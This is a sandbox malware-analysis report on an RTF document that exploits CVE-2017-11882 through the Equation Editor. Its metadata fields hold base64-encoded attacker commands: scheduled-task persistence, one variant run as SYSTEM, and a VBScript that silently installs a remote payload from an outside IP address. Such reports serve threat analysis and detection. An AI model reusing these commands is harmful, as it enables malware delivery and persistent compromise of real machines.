File name:

bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf

Full analysis: https://app.any.run/tasks/904d9d5e-8326-4e8b-862f-be615f260229
Verdict: Malicious activity
Analysis date: April 23, 2019, 13:32:57
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
ole-embedded
generated-doc
exploit
cve-2017-11882
Indicators:
MIME: text/rtf
File info: Rich Text Format data, version 1, ANSI
MD5:

B3F8ABE274CB6A5926BD5C3FC2168997

SHA1:

D3AE9CAA678754631AED1C82C409B5D43A0A9C80

SHA256:

BF9987B84B3F7DAAA460777E5850A60F10898D0238048D3D5D07D7EC1656E47A

SSDEEP:

3072:7Qc9WBKBHFuVPrlmIAzqv/njAa1UWGV0ODJ:7QIW4BluVPR53njAMGVdDJ

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Equation Editor starts application (CVE-2017-11882)

      • EQNEDT32.EXE (PID: 2152)

    • Uses Task Scheduler to run other applications

      • EQNEDT32.EXE (PID: 2596)

    • Loads the Task Scheduler COM API

      • schtasks.exe (PID: 3032)

  • SUSPICIOUS

    • Creates files in the Windows directory

      • EQNEDT32.EXE (PID: 2596)

  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3140)

    • Creates files in the user directory

      • WINWORD.EXE (PID: 3140)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.rtf | Rich Text Format (100)

EXIF

RTF

Title: Dear All
Subject: c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL0Y=
Author: Windows User
Comments: U2V0IHdzID0gQ3JlYXRlT2JqZWN0KCJXU2NyaXB0LlNoZWxsIikNCndzLlJ1biAibXNpZXhlYyAvcSAvaSBodHRwOi8vMTg1LjIzNC43My40L0IiLDA=
LastModifiedBy: AntiSec
CreateDate: 2019:04:17 10:33:00
ModifyDate: 2019:04:17 10:33:00
RevisionNumber: 2
TotalEditTime: 1 minute
Pages: 1
Words: 129
Characters: 741
Company: c2NodGFza3MgL2NyZWF0ZSAvc2MgTUlOVVRFIC90biAiQXBwIiAvdHIgIkM6XFdpbmRvd3NcdHJhY2luZ1x0cmFjaW5nLnZicyIgL21vIDIgL3J1IHN5c3RlbQ==
CharactersWithSpaces: 869
InternalVersionNumber: 24689
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
36
Monitored processes
4
Malicious processes
1
Suspicious processes
1

Behavior graph

Click at the process to see the details
start winword.exe no specs eqnedt32.exe no specs eqnedt32.exe no specs schtasks.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
2152"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -EmbeddingC:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEsvchost.exe
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\advapi32.dll
2596"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEEQNEDT32.EXE
User:
admin
Company:
Design Science, Inc.
Integrity Level:
MEDIUM
Description:
Microsoft Equation Editor
Exit code:
0
Version:
00110900
Modules
Images
c:\program files\common files\microsoft shared\equation\eqnedt32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
3032schtasks.exe /create /sc MINUTE /tn ChromeApp /tr "C:\Windows\tracing\ChromeApp.vbs" /mo 2 /FC:\Windows\system32\schtasks.exeEQNEDT32.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
3140"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Exit code:
0
Version:
14.0.6024.1000
Modules
Images
c:\program files\microsoft office\office14\winword.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.7601.17514_none_ec83dffa859149af\comctl32.dll
Total events
1 043
Read events
713
Write events
325
Delete events
5

Modification events

(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:0.<
Value:
302E3C00440C0000010000000000000000000000
(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
Off
(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
Operation:writeName:1033
Value:
On
(PID) Process:(3140) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:WORDFiles
Value:
1318518814
(PID) Process:(3140) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1318518928
(PID) Process:(3140) WINWORD.EXEKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000000000000F01FEC\Usage
Operation:writeName:ProductFiles
Value:
1318518929
(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
Operation:writeName:MTTT
Value:
440C00006C29FF16D9F9D40100000000
(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:writeName:y/<
Value:
792F3C00440C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Operation:delete valueName:y/<
Value:
792F3C00440C000004000000000000008C00000001000000840000003E0043003A005C00550073006500720073005C00610064006D0069006E005C0041007000700044006100740061005C0052006F0061006D0069006E0067005C004D006900630072006F0073006F00660074005C00540065006D0070006C0061007400650073005C004E006F0072006D0061006C002E0064006F0074006D00000000000000
(PID) Process:(3140) WINWORD.EXEKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
0
Executable files
0
Suspicious files
1
Text files
2
Unknown types
3

Dropped files

PID
Process
Filename
Type
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR5621.tmp.cvr
MD5:
SHA256:
3140WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:
SHA256:
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\8.tbinary
MD5:
SHA256:
2596EQNEDT32.EXEC:\Windows\tracing\ChromeApp.vbstext
MD5:
SHA256:
3140WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtfpgc
MD5:
SHA256:
2596EQNEDT32.EXEC:\Windows\tracing\ChromeApp.ps1text
MD5:
SHA256:
3140WINWORD.EXEC:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5909E647.wmfwmf
MD5:82154D73906767D7B810864B32E3EBAD
SHA256:6FD66589D2ED5D42039174EA02F331F127EFEB166E61EA3558B0EA7A2B771A77
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
0
DNS requests
0
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

No data

DNS requests

No data

Threats

No threats detected
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2026 ANY.RUN ALL RIGHTS RESERVED
ANY.RUN
Reports
bf9987b84b3f7daaa460777e5850a60f10898d0238048d3d5d07d7ec1656e47a.rtf